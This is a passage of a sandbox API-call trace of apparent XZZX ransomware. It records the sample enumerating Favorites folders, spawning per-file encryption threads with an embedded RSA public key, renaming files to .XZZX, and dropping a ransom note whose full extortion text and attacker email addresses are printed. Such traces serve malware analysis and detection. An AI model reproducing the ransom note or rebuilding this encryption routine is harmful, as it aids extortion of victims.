f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.557] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0260.557] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1530 [0260.557] Sleep (dwMilliseconds=0x96) [0260.712] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0260.713] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0260.713] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0260.713] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0260.713] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0260.713] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0260.713] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.713] SetErrorMode (uMode=0x1) returned 0x1 [0260.714] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 67 [0260.714] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0260.714] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0260.714] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1534) returned 0x0 [0260.714] RegQueryValueExW (in: hKey=0x1534, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e5970, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43e5970*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0260.714] RegCloseKey (hKey=0x1534) returned 0x0 [0260.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0260.714] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0260.714] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0260.715] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0260.717] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0260.717] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0260.717] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0260.718] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0260.718] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0260.718] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0260.718] SetErrorMode (uMode=0x1) returned 0x1 [0260.718] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0260.718] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.718] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.718] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0260.718] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0260.719] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\MSN Websites") returned="MSN Websites" [0260.719] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0260.719] StrStrW (lpFirst="MSN Autos.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.719] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntldr") returned 0x0 [0260.719] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTLDR") returned 0x0 [0260.719] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.719] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntdetect.com") returned 0x0 [0260.719] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0260.719] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.719] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0260.719] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.719] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0260.719] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x153c [0260.720] WaitForSingleObject (hHandle=0x153c, dwMilliseconds=0xffffffff) returned 0x0 [0260.722] Sleep (dwMilliseconds=0x96) [0260.868] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0260.868] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0260.869] lstrcmpW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0260.869] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.869] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntldr") returned 0x0 [0260.869] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTLDR") returned 0x0 [0260.869] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.869] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntdetect.com") returned 0x0 [0260.869] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0260.869] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.869] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0260.869] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.869] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0260.869] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0260.869] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1540 [0260.869] Sleep (dwMilliseconds=0x96) [0261.026] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0261.026] lstrcmpW (lpString1="MSN Money.url", lpString2="..") returned 1 [0261.026] lstrcmpW (lpString1="MSN Money.url", lpString2=".") returned 1 [0261.026] StrStrW (lpFirst="MSN Money.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0261.026] StrStrW (lpFirst="MSN Money.url", lpSrch="ntldr") returned 0x0 [0261.026] StrStrW (lpFirst="MSN Money.url", lpSrch="NTLDR") returned 0x0 [0261.026] StrStrW (lpFirst="MSN Money.url", lpSrch="NTDETECT.COM") returned 0x0 [0261.026] StrStrW (lpFirst="MSN Money.url", lpSrch="ntdetect.com") returned 0x0 [0261.026] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0261.026] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0261.026] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0261.026] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0261.026] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0261.026] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0261.027] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1544 [0261.027] Sleep (dwMilliseconds=0x96) [0261.181] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0261.181] lstrcmpW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0261.181] lstrcmpW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0261.181] StrStrW (lpFirst="MSN Sports.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0261.181] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntldr") returned 0x0 [0261.181] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTLDR") returned 0x0 [0261.181] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTDETECT.COM") returned 0x0 [0261.181] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntdetect.com") returned 0x0 [0261.181] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0261.181] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0261.181] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0261.181] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0261.181] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0261.181] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0261.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1548 [0261.181] Sleep (dwMilliseconds=0x96) Thread: id = 206 os_tid = 0x5f8 Thread: id = 209 os_tid = 0x614 Thread: id = 216 os_tid = 0x660 Thread: id = 217 os_tid = 0x664 Thread: id = 218 os_tid = 0x68c Thread: id = 221 os_tid = 0x6a8 Thread: id = 224 os_tid = 0x6b4 Thread: id = 227 os_tid = 0x6d4 Thread: id = 230 os_tid = 0x6e8 Thread: id = 233 os_tid = 0x70c Thread: id = 238 os_tid = 0x724 Thread: id = 241 os_tid = 0x730 Thread: id = 244 os_tid = 0x74c Thread: id = 247 os_tid = 0x75c Thread: id = 250 os_tid = 0x770 Thread: id = 253 os_tid = 0x77c Thread: id = 256 os_tid = 0x720 [0098.381] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.381] lstrcpyW (in: lpString1=0x420f460, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0098.381] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.381] SetErrorMode (uMode=0x1) returned 0x1 [0098.381] lstrcpyW (in: lpString1=0x420f860, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0098.381] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa377ac75, Data2=0xb8bd, Data3=0x4a53, Data4=([0]=0xac, [1]=0x87, [2]=0xc9, [3]=0x5c, [4]=0x7d, [5]=0x67, [6]=0xa3, [7]=0x50))) returned 0x0 [0098.381] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\B0AD3AB92537B4FBFE37930729309943.XZZX") returned 44 [0098.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0098.382] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\B34E6A6135A28747A377AC7539C36B8F.XZZX") returned 44 [0098.382] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 257 os_tid = 0x7b4 [0098.849] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.849] lstrcpyW (in: lpString1=0x420f460, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0098.849] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.849] SetErrorMode (uMode=0x1) returned 0x1 [0098.849] lstrcpyW (in: lpString1=0x420f860, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0098.849] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7ba27f1f, Data2=0xf4c2, Data3=0x4349, Data4=([0]=0xa1, [1]=0x61, [2]=0xe1, [3]=0x9, [4]=0x31, [5]=0xb6, [6]=0xe1, [7]=0x1))) returned 0x0 [0098.849] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\bootmgr") returned 14 [0098.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0098.849] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\924DE17E405491527BA27F1F4475759A.XZZX") returned 44 [0098.849] StrStrW (lpFirst="bootmgr", lpSrch="XZZX") returned 0x0 [0098.849] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0098.850] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 258 os_tid = 0x7c8 [0098.981] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 